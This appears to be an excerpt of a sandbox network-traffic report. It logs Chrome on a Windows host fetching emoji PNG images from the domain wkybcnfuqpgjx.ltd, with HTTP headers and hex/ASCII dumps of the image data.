                                  2025-01-12 00:04:02 UTC1369INData Raw: e8 e8 e7 e7 e7 e7 e6 e6 e5 e5 e5 e3 e3 e3 e2 e2 e2 e0 e0 e0 de de de dd dd dd dc dc dc da da da d9 d9 d9 d8 d8 d8 d7 d7 d7 d6 d6 d6 d3 d3 d3 cf cf d0 c6 c6 c6 ba ba ba e1 e1 e1 db db db d3 aa 83 ee e6 dd f2 e9 e2 d8 b0 86 e7 cc ae e4 c6 a6 e2 c1 9e eb d8 c5 f7 f2 ed dc ae 76 cd 9a 66 82 ac d4 88 b5 df 85 b4 de 86 b3 dc 73 a6 d5 71 a3 d2 9a 9f a4 b7 b2 ae 98 97 97 92 92 92 94 94 93 6d 7c 89 49 69 85 5b 76 8f 68 81 98 70 88 9e 74 8d a4 79 91 a7 7c 97 b0 83 99 ac 83 9b b1 89 9e b2 8d a3 b7 90 a7 bc 94 a9 bc 96 ab be 8d a2 b6 8b 9f b3 8c a1 b4 8f a3 b7 8e a3 b6 90 a5 b7 8e a1 b2 93 a7 ba 4f 69 82 4b 62 78 46 5e 74 3d 54 6a 39 50 66 41 59 6f 3f 56 6c 40 57 6c 3e 55 6b 3f 57 6d 3d 55 6b 40 58 6e 40 57 6d 3f 56 6c 39 50 66 36 4d 63 39 51 68 3d 55 6c 40 5a 71 43
                                  Data Ascii: vfsqm|Ii[vhpty|OiKbxF^t=Tj9PfAYo?Vl@Wl>Uk?Wm=Uk@Xn@Wm?Vl9Pf6Mc9Qh=Ul@ZqC
                                  2025-01-12 00:04:02 UTC1369INData Raw: e8 7f 38 74 69 92 a1 18 45 c0 75 8a bb 4f de cd 6f ef 72 01 fc ee 10 00 7b 11 42 60 8e 95 dc 22 21 6a 14 04 63 97 43 34 b4 86 29 0a 0e 78 8a d5 07 93 4c 42 67 40 80 60 07 f0 12 12 18 48 20 a2 96 d4 17 6c 80 88 94 cf 60 20 54 08 a6 32 83 27 41 7b d9 5b aa 13 8c 1f 96 37 b9 64 18 ea 6b c5 26 a5 5e 08 f3 be 79 f5 19 4c 75 70 50 99 71 50 23 4f f1 d5 82 46 09 29 3d 7b 1e b2 fc b8 64 21 b6 54 13 00 45 28 49 a5 e5 34 9d 33 63 00 ea 77 c2 29 51 29 a8 74 09 47 49 59 00 28 01 24 9c 41 6e 12 d7 24 85 dd 63 af 7a 41 10 e0 12 e9 26 20 d2 90 44 41 d4 cc a4 8a af 12 2a 52 15 96 48 ad a0 c0 31 21 a8 0e 80 14 21 cd cd 8c c1 61 d3 fe b9 0a 23 29 8d 4a a1 ab 4b 71 da ae ca 00 54 e7 08 45 ca bf a0 82 92 93 6a 23 58 fe a9 e4 e4 d4 1e a5 b9 b9 39 09 8a 6e d4 a2 42 4c 5c 75 82
                                  Data Ascii: 8tiEuOor{B`"!jcC4)xLBg@`H l` T2'A{[7dk&^yLupPqP#OF)={d!TE(I43cw)Q)tGIY($An$czA& DA*RH1!!a#)JKqTEj#X9nBL\u
                                  2025-01-12 00:04:02 UTC1369INData Raw: db d7 9b 8e cf b8 27 63 a8 06 a0 58 6b ba 3b 5d 6a da 48 40 6a 60 44 64 cd a9 17 09 7d 29 a8 8a 19 0c 9a 98 61 2c dd 3d 15 84 8a f4 4b b0 22 69 db 93 54 d9 9f ae 0e a0 0d 2f 84 9c 74 29 4d ef 04 18 12 58 76 5e 9c f2 c3 cf a6 6d 75 9c 24 92 7e aa 11 7e 52 da ed 05 f6 f5 5b d3 27 be e7 b3 30 9a bd 17 df 43 a8 3c 50 cd ac 64 c5 2f a5 3d ed fa 85 5d 5d 17 ba 99 6c f1 bb 3a 70 af 49 85 81 c6 98 cb cd 81 98 4e d7 2d 4c aa fa a5 b6 ba 90 66 52 82 b2 dd 7e a5 a3 4a ae d6 56 7e 06 41 34 6b b6 98 89 9b 54 bc 43 1c a2 97 56 23 f9 d6 b9 1e 6e 80 19 1d 47 ff b9 e7 cd ee 13 38 48 8a 11 4e e3 56 dc 6b 59 39 20 ec 0c a2 9c 4d 85 f7 64 a2 8b 0d 69 7a 9d c8 4e ee e5 3a 1b 80 11 24 fc c4 99 71 39 f3 f0 58 1d c6 41 3a 18 09 73 65 17 40 b5 13 02 b4 0b 21 95 00 02 de 8c b4 d2
                                  Data Ascii: 'cXk;]jH@j`Dd})a,=K"iT/t)MXv^mu$~~R['0C<Pd/=]]l:pIN-LfR~JV~A4kTCV#nG8HNVkY9 MdizN:$q9XA:se@!
                                  2025-01-12 00:04:02 UTC545INData Raw: 53 cd e8 20 d1 53 9b 35 6b 93 08 09 75 47 ef 9b c0 c0 48 6d 2d 4b b3 bb c0 a3 6d ca 05 59 dd 6b 2b fb 70 03 9d 20 e0 30 c3 61 30 1a 41 ec dd b7 00 43 bc 73 0c af 5e 4a 8b b0 59 16 74 66 5d 9b 04 09 21 ba 71 80 dd 1b f9 f7 60 71 ce b9 76 56 83 04 56 0f 96 08 ae ce ad ee 69 6b de 70 21 7c 16 45 4b 05 e3 be 49 a4 9c 10 36 b6 dc 54 44 ed 16 89 08 5f d0 05 6e cf 58 9e 74 a4 c1 90 75 66 d3 dd 69 ba 35 65 3b fa 8e d3 06 66 a5 82 2d 4b cd 5a e9 ca 3c ce 19 b8 7e ae 07 3e 51 6e 30 40 25 f0 5a 20 54 5b 47 14 6e ae 1d a2 06 08 bb 39 23 3d fb a3 a4 cd 05 02 cb 0b cb 0b 0c 71 c9 99 59 e7 91 20 39 6d 76 a3 54 90 b4 bd 27 6b f4 14 99 37 17 fa 39 36 0a 8e 20 39 38 48 07 81 33 a8 b6 99 58 86 44 f3 3e 3b 2d ba 89 b5 86 24 ef 0f 10 ac d8 86 8b b5 ba 36 66 0b c3 5f 4a 05 65
                                  Data Ascii: S S5kuGHm-KmYk+p 0a0ACs^JYtf]!q`qvVVikp!|EKI6TD_nXtufi5e;f-KZ<~>Qn0@%Z T[Gn9#=qY 9mvT'k796 98H3XD>;-$6f_Je


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  114192.168.2.650048172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC608OUTGET /img-apple-160/1f1e6-1f1ff.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:03 UTC902INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:03 GMT
                                  Content-Type: image/png
                                  Content-Length: 4588
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-11ec"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I9HmshK%2B1jtdcsfzSPAZHOiXWkkuRYmmQja%2B9NFQDQFfeibDEPUCpMFUCZQdzfxmO%2FWZDQH4wbvgnt4%2BpkOscT65HHYeWTbIA236aMdVOT6FSX54V4o8Y%2BJndWGnwd4nh8rZNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30c08160f79-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1499&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1887524&cwnd=243&unsent_bytes=0&cid=72b98744f8673450&ts=737&x=0"
                                  2025-01-12 00:04:03 UTC467INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 05 61 3c 9e 1a 36 84 05 20 17 6b 89 02 55 72 67 9f b3 0b 57 39 16 78 51 62 9b af 0c 59 3a 67 9f b3 0c 58 39 6a a2 b6 0c 58 3a 69 a2 b5 0c 58 39 0c 58 3e 6b a4 b7 61 9a ae 5c 97 ac 07 53 35 62 9a ae 07 53 34 13 5c 41 11 5e 3f 16 67 46 09 56 37 5f 98 ad 04 50 32 5e 98 ad 5e 97 ab 2c 73 8c 2f 75 8e 4c 88 9e 0c 82 54 ed 29 55 c4 04 2e 24 b5 7c 25 b8 7e 25 a1 cd 25 9f cb ff ff ff cc 0b 35 25 b7 7d 25 9e c9 e9 24 4f e0 1b 47 c8 09 33 e6 21 4c c6 07 31 d2 0f 3b 02 7b a6 cf 0e 39 01 7a a4 08 81 ac 04 93 5a 09 83 af c7 04 2f 01 8f 57 e4 1f 4b 1b ad 73 d5 10 3c 19 93 bf 02 91 58 21 b1 78 e2 1d 49 06 95 5c 08 97 5e 0d 88 b4 0d 86 b1 23
                                  Data Ascii: PNGIHDRPLTEGpLa<6 kUrgW9xQbY:gX9jX:iX9X>ka\S5bS4\A^?gFV7_P2^^,s/uLT)U.$|%~%%5%}%$OG3!L1;{9zZ/WKs<X!xI\^#
                                  2025-01-12 00:04:03 UTC1369INData Raw: 53 a1 bc 17 98 64 02 66 3e af 18 3a bf 19 3f ed 1d 4b 2e 8e b1 18 88 b1 15 7e 54 43 91 ae fc 0a 3c 28 87 aa ca 19 41 18 85 ac 9b 02 23 15 71 4c 13 9c 66 e0 00 28 be 05 2e b5 04 2a 46 8b a4 ab 05 29 24 9a c5 37 8a a9 10 8b 5a 17 74 97 56 9d b7 16 7e a5 49 98 b4 fe fc fd 01 4e 2f 17 82 a9 13 6b 48 40 9c be 20 a3 6f 2f 9b c1 26 a9 75 0c ca 83 04 b6 71 1e 9d 6a da 09 37 00 57 75 02 71 98 37 95 b8 06 82 50 00 69 8f 06 6b 42 00 a7 62 fa 20 50 03 61 82 01 90 bc d5 00 29 07 77 4a 2a 93 b9 30 77 97 1c 94 64 1e 8b 5f fc e0 e6 06 9c c8 bd 40 61 0b b1 de 00 53 71 19 be 7f 11 ab d7 f3 69 88 f2 49 6f 09 c2 7c ed 34 5d ef 3d 65 24 96 bf 3f 7c 5c 01 95 c1 f1 59 7b f7 a5 b7 02 af 6a 05 a5 d2 1b a5 d2 3b 83 a0 a9 4b 64 5d 58 84 f8 b0 c0 f5 87 a0 51 73 5a 70 42 69 9c 27 42
                                  Data Ascii: Sdf>:?K.~TC<(A#qLf(.*F)$7ZtV~IN/kH@ o/&uqj7Wuq7PikBb Pa)wJ*0wd_@aSqiIo|4]=e$?|\Y{j;Kd]XQsZpBi'B
                                  2025-01-12 00:04:03 UTC1369INData Raw: 33 8d 40 eb 0a 26 63 38 d0 66 00 be 5b c1 89 1d 62 66 63 99 02 18 3b 2b 20 ef 30 f3 31 20 f7 19 81 bc 7e 08 34 a1 99 01 d7 c0 69 1c 0c 84 cc b4 82 e0 9b e8 30 04 7d 36 f0 71 20 df 23 0c a8 1f 68 a6 36 cc e2 c5 28 9c 04 4c 9a 3d 90 ef 11 d6 61 9b 11 98 cd 81 c0 83 80 8f 01 27 c1 58 a6 03 42 66 03 44 df d4 40 ee 63 40 56 3f 13 9b 05 90 95 70 c6 40 f4 f1 25 68 00 b2 06 07 03 df 4e 18 13 1b 07 f2 b3 64 ce 80 c9 1c c8 b7 48 30 90 fb 38 90 d9 66 0a 84 62 cc 1e 18 3b 19 08 bc 49 40 d0 31 9e 25 70 77 9d 9e 7b 5a aa 21 60 8d 5d 81 97 12 04 26 cd a4 c5 86 3d 3c 0d 10 eb 67 01 c4 8c 8d b5 34 37 36 37 37 d7 65 ff 5c 3b d4 a6 a5 13 f2 a2 ed e5 ab 57 97 2f 9f 8c 85 4f 80 9f b0 b1 33 05 f2 02 4e 06 6e f9 8f c0 96 c6 3b 77 ee 34 36 b6 ec 3a fd 74 e8 d1 e3 d6 fa be 37 94
                                  Data Ascii: 3@&c8f[bfc;+ 01 ~4i0}6q #h6(L=a'XBfD@c@V?p@%hNdH08fb;I@1%pw{Z!`]&=<g47677e\;W/O3Nn;w46:t7
                                  2025-01-12 00:04:03 UTC1369INData Raw: d1 17 1b d6 ae dd ba 1a 7c c1 40 f4 7d a6 67 65 6e ce ad fb f7 4f 75 74 76 15 57 5c 98 6b a0 24 c8 24 e0 f1 3a 9d 2e 7b 49 09 1d 06 db b3 6b 0d 4d 48 5b 84 59 b2 70 e1 54 c0 95 3a 70 15 0a 13 73 f7 a1 f1 44 c7 60 8f 29 b0 b4 74 f6 40 49 b6 6b 4f a0 df b4 3e 7c f2 6c 43 03 94 ad 41 b7 4d 0f 5c cf 80 ab 26 80 9b 8e 1f ff 65 5f e2 b1 b3 1f 9a 01 7b 8e 54 2c 58 30 0b a0 ac 2d 37 09 97 db eb 85 d8 52 4e b3 04 26 9a 00 4f 9d f8 e1 e0 c1 8f 4c 80 ef fd f9 fd 60 cf 85 1a 98 49 fc d1 87 25 50 2d 40 9b 80 cb ed f5 92 a6 60 9b 35 10 0a a8 6d 11 13 e0 87 66 c0 9f be 39 76 f4 6c 6f 4f 91 36 92 f2 f2 a6 01 06 02 14 1a 0a b6 b4 be 7f db b1 7f d0 44 d2 30 8e e3 b1 12 64 10 2d 24 6e c4 76 b7 b1 3d 10 c4 60 d8 81 80 16 69 16 72 85 45 88 b2 9b b9 70 29 54 16 31 2b 68 a1 b7
                                  Data Ascii: |@}genOutvW\k$$:.{IkMH[YpT:psD`)t@IkO>|lCAM\&e_{T,X0-7RN&OL`I%P-@`5mf9vloO6D0d-$nv=`irEp)T1+h
                                  2025-01-12 00:04:03 UTC14INData Raw: 74 ba 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: tIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  115192.168.2.650049172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC370OUTGET /img-apple-160/1f1e6-1f1ec.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC896INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 5106
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-13f2"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiJup2fT4nfUPZaN2qwhZUTZjerPC2sq7rD5sOS8pOFPO9tFHHL5476qcxzpgD60yhS49oILGtC52wE%2Bbunb%2BMMRV%2BkIeI4Kw5AlHy2GaeywcQZlOTnMwkpkgHRwTBDHDm68dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30c0e3143b1-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1583&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=1713615&cwnd=32&unsent_bytes=0&cid=f67fe2e4947c1134&ts=162&x=0"
                                  2025-01-12 00:04:02 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 02 fd 50 4c 54 45 47 70 4c 69 44 47 63 4a 4c 61 2d 31 66 11 1a 67 67 67 65 11 1a 6b 69 69 60 1b 22 68 68 68 8b 20 2c 5c 10 18 63 63 63 62 19 21 61 61 61 63 15 1d 92 1f 2c 75 09 15 96 29 35 65 65 65 67 11 1a 69 69 69 4a 4b 4b 67 14 1d 64 64 64 69 69 69 65 12 1a 62 62 62 69 14 1d 2b 2e 2e 6a 6a 6a 68 14 1d 74 31 38 60 0c 15 ff ff ff fe fe fd fb ff ff fc fd fd fc fc fc fa fb fb f9 f9 f9 f5 f1 f1 e0 ef f6 ff fc 3a ec e4 e5 ff f2 37 f2 d5 d8 ff ec 38 ff e5 37 c3 dc f0 d4 d8 d8 ff e4 22 ff e0 35 ff dc 33 fd d9 37 fb d7 38 fa d6 37 f8 d4 35 ee bd c1 c8 c9 c9 f2 d0 36 d9 ce 55 ea ca 34 9e c8 e7 e4 c2 2f cb c4 57 b6 ba b9 da bb 31 de a0 a6 b2 be 6c ca ae 31 e1
                                  Data Ascii: PNGIHDRPLTEGpLiDGcJLa-1fgggekii`"hhh ,\cccb!aaac,u)5eeegiiiJKKgdddiiiebbbi+..jjjht18`:787"5378756U4/W1l1
                                  2025-01-12 00:04:02 UTC1369INData Raw: c9 1b 2d 51 51 51 aa 28 36 da 14 1e bf 1e 2f b8 21 31 bb 1f 30 bd 1d 2e b3 21 30 ca 15 27 b8 1d 2d bc 1b 2c 4d 4d 4d aa 22 30 bc 19 2a b9 1a 2b 9e 26 33 55 4c 26 b9 18 29 b6 19 2a 49 49 49 b3 19 29 b6 17 28 14 56 87 b5 16 27 a3 1e 2c 9c 21 2e c7 0e 1f be 11 23 b3 16 26 46 46 46 b1 15 25 93 21 2d ab 16 26 b3 12 24 44 44 44 b0 13 24 b0 12 23 b2 11 22 42 42 42 ae 11 22 b0 10 21 a2 16 25 4a 42 26 8d 1f 2a ac 10 21 ae 0f 1f 40 40 40 aa 0f 1f 96 18 25 ac 0e 1e 11 4b 75 86 1e 29 a6 0f 1f 3c 3c 3c 9f 0e 1e 8d 16 23 7d 1c 26 96 0e 1c 38 38 38 85 15 21 91 0f 1c 3c 38 26 73 1a 24 17 3d 5b 34 34 34 6e 19 22 88 0c 18 81 0e 1b 31 30 2f 75 11 1c 6b 14 1d 2d 2d 2c 7a 0a 16 59 18 1f 75 0a 15 6e 0c 16 65 10 18 2a 2a 29 1a 2a 36 27 26 26 65 0a 13 24 24 24 5e 09 12 21 21 21
                                  Data Ascii: -QQQ(6/!10.!0'-,MMM"0*+&3UL&)*III)(V',!.#&FFF%!-&$DDD$#"BBB"!%JB&*!@@@%Ku)<<<#}&888!<8&s$=[444n"10/uk--,zYune**)*6'&&e$$$^!!!
                                  2025-01-12 00:04:02 UTC1369INData Raw: 7c f7 0d fd c7 03 85 1a 05 48 cd 53 a3 c6 6a e8 e9 f3 3d b7 84 66 8f 0f 3c bd ff 2f d1 16 4c 1e 7e 7d 88 62 19 41 38 ff db 37 44 95 42 a8 a5 92 da d1 5a c1 7c 2d 80 26 9f f4 07 ea bb 1f 7d ec 7b 81 02 c4 59 9f 7a 15 1a d9 d3 af aa fc e6 08 50 a2 ff f1 fd b7 6f 8d e3 d5 2b ae 9d de 7f bd 14 4a b6 9c 20 2b 1e ef 13 5a 82 42 21 d2 5a 42 41 42 6b 00 ba c5 fa 4c 37 37 fe c8 c0 fb 7b 7f 77 8c a2 67 5f 85 79 75 37 ea db 7d 89 3b fd 01 94 dd f7 f8 0f 36 fd f5 24 da 80 e0 e4 7f 6d 08 57 58 b0 4a fb dc 47 d7 82 81 49 0a 0a 63 09 68 93 a3 41 a5 a7 01 46 9b 34 b5 55 31 7f e1 d9 df 2c ce 52 1c d4 56 ed 83 1d ec d4 28 d1 0e f7 94 5d d8 7d c4 fd 66 14 9f 4f b0 02 e7 f6 f5 b3 2c c1 94 91 23 7d 43 3a ed 3f 4e 15 a0 14 a0 a1 b9 d6 50 b1 27 93 58 80 e6 39 7e e9 b1 3d 42 d6
                                  Data Ascii: |HSj=f</L~}bA87DBZ|-&}{YzPo+J +ZB!ZBABkL77{wg_yu7};6$mWXJGIchAF4U1,RV(]}fO,#}C:?NP'X9~=B
                                  2025-01-12 00:04:02 UTC1369INData Raw: 1f 4a c0 00 cc bc f6 dd 72 2d 72 36 5a 9c 16 6c e3 56 4e 0a 4d bb 82 9b f3 79 c9 56 25 98 c2 ed 17 fe a0 3f 4c 74 23 3f 08 66 50 7e e1 74 e4 f6 17 00 40 54 2a d0 44 a3 23 ea 76 de 92 6c f5 09 86 88 e9 bd f8 c2 2f 97 7b ca 00 ce e2 c2 64 7d 2a 04 70 45 ae 56 f1 e6 ff 8d d7 a9 5f bf 6b 29 8a 55 0a a6 44 1b 2a 7b 2f 22 48 ce d6 10 3c 42 b5 4c 35 a0 70 19 38 9a f9 1b 14 b0 76 82 88 9c 91 e2 99 3e b8 75 84 80 07 80 47 a0 b8 5c 3c ae 37 13 c9 d0 26 6d b5 14 59 79 51 47 1d 6b 82 14 db 65 00 ac a9 20 97 d6 88 5d 77 b1 16 f0 7c 6f 4d 59 6b 2c 08 22 73 05 77 06 6b 80 ed e7 07 b9 c6 5a 0b 82 b0 21 0b 01 56 4f ad 30 12 48 74 02 47 5b 28 32 72 9c 84 58 2d a4 b8 b1 26 6d ac 7d 82 40 20 b7 8b 08 ab 80 72 67 60 48 f2 5c 00 ac 47 82 b0 02 77 64 cc e7 e8 18 66 a1 80 5c 0e
                                  Data Ascii: Jr-r6ZlVNMyV%?Lt#?fP~t@T*D#vl/{d}*pEV_k)UD*{/"H<BL5p8v>uG\<7&mYyQGke ]w|oMYk,"swkZ!VO0HtG[(2rX-&m}@ rg`H\Gwdf\
                                  2025-01-12 00:04:02 UTC526INData Raw: 59 09 a6 22 49 6c 29 d9 4f e1 c0 33 86 b3 fc de 97 3f a2 2c 6e dd bb f2 91 f3 f9 58 2d 09 2d 56 62 80 68 d8 7d 1a 4d de 40 13 1b 0a 0c 14 35 78 83 22 4b 90 12 30 28 81 a6 65 5b b2 49 28 b2 9c 7f 70 cf a8 05 17 a8 0f 3f d4 37 b5 05 85 58 cd 4a 2b fe 2e c8 50 86 91 8c 34 d1 8d ae 25 d7 50 ca 38 65 4c 88 37 40 61 07 36 88 66 b6 1f b4 16 24 10 3a 68 16 4f 9f 25 93 24 e9 e3 28 bd 20 68 f1 62 74 01 bf ff f3 df 99 74 6d c0 be 6d c7 cc f6 44 2d 16 53 52 ca 40 46 5a 69 64 c1 b6 09 d7 12 3f 0c 60 81 00 56 d0 6a 85 59 fa 31 b4 af 03 09 09 05 5c 02 a0 14 3c 40 01 75 00 11 e0 21 ca 57 31 2f 18 34 cc d2 89 70 cd d4 77 ab 96 08 87 bf 52 49 62 db 15 06 be 2f b5 42 7b 10 c6 7b 9d 1f 04 08 25 7e bd d6 42 f0 30 10 a8 50 07 30 8e e5 86 96 8a 4f ac 22 5d db cc 16 cd 26 be 60
                                  Data Ascii: Y"Il)O3?,nX--Vbh}M@5x"K0(e[I(p?7XJ+.P4%P8eL7@a6f$:hO%$( hbttmmD-SR@FZid?`VjY1\<@u!W1/4pwRIb/B{{%~B0P0O"]&`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  116192.168.2.650053172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:02 UTC608OUTGET /img-apple-160/1f1e7-1f1f8.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:02 UTC894INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:02 GMT
                                  Content-Type: image/png
                                  Content-Length: 4321
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-10e1"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RAwEUjRW2dUD%2FDuL6gDukJX3CDVj1PL3LG4CsdGuT3iYJ9PQncJHtZSwf9nN6FrPsRBJMmGZnKekYZYPwkQcdBGBKkSgthv2093exWq5qgAsvBgMLbeb7zUvlLnjZwCmAISQvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e30c3f7441ac-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1765&rtt_var=664&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1186&delivery_rate=1645070&cwnd=252&unsent_bytes=0&cid=51e83145e2f966c9&ts=379&x=0"
                                  2025-01-12 00:04:02 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 1e 65 71 63 a6 b1 0d 55 61 5c a1 ac 0c 58 64 67 a9 b4 0b 54 60 0c 57 64 5c a2 ae a7 96 3c 78 8c 55 17 79 8a 13 69 79 69 ab b6 0b 56 62 5f a2 ad 0b 59 66 19 16 16 00 00 00 5f a2 ad 0e 59 66 00 00 00 69 ac b7 06 51 5d 12 5e 6b 62 a4 af 07 52 5e 0b 57 64 6a ac b7 0c 58 65 60 a1 ad 0d 59 66 6b ad b8 5b 9f ab 11 5d 6a 09 4f 5b 06 52 5f ff fe 63 ff f7 5f fd f3 63 ff ee 5f ff ea 4d ff e8 54 ff e6 5b ff e7 4c fb e4 5e fb e3 5e f9 e3 5d ff e2 52 f8 e2 5c ff e0 4b f6 df 59 fe db 44 f2 dc 56 e5 de 66 ef d9 54 ed d7 50 d4 db 70 f8 d2 3d ea d4 4e e7 d1 4b f5 cb 35 c3 d6 76 e4 ce 48 e3 cb 45 d4 cd 5a e0 ca 44 b2 d5 84 bb d0 72 de c7 41 dc
                                  Data Ascii: PNGIHDRPLTEGpLeqcUa\XdgT`Wd\<xUyiyiVb_Yf_YfiQ]^kbR^WdjXe`Yfk[]jO[R_c_c_MT[L^^]R\KYDVfTPp=NK5vHEZDrA
                                  2025-01-12 00:04:02 UTC1369INData Raw: a5 3c 9f b0 1b ab c4 0d ae d5 1b aa c2 20 a7 be 19 a9 c1 0e ad c8 8d 86 42 3d 99 a8 1f a4 ba 17 a7 bf 65 90 67 2a 9f b3 33 9f 97 04 aa d8 15 a5 be 15 a4 bc 1e a0 b6 2a 9b ae 07 a6 cd 13 a2 bb 3e 90 9e 12 a1 b9 1b 9d b3 2b 96 a9 1e 9a af 10 9f b8 10 9d b5 0f 9c b4 14 9a b1 00 9d cb 0d 9b b3 16 97 ad 1c 95 a7 0b 99 b1 7e 75 3b 0d 97 af 09 98 b0 32 89 91 00 98 c4 08 97 af 16 91 a5 08 96 ae 1a 8e a2 08 95 ad 0e 92 a9 05 94 ac 00 93 be 1b 8a 9d 03 92 aa 02 90 a8 11 89 9e 01 8f a7 00 8c b9 03 8e a6 00 8d b0 17 85 97 01 8d a5 08 8a a0 73 67 32 18 7f 90 05 84 9a 0b 7e 92 15 79 89 14 76 87 62 5b 33 04 79 8e 14 71 81 12 6d 7c 07 71 83 10 68 77 04 6c 7e 0e 65 73 13 61 6e 0f 5e 6b 05 5f 6e 0e 5a 67 4a 45 2b 38 47 49 05 59 67 07 55 63 04 52 5f 03 4d 5a 10 44 4d 34 35
                                  Data Ascii: < B=eg*3*>+~u;2sg2~yvb[3yqm|qhwl~esan^k_nZgJE+8GIYgUcR_MZDM45
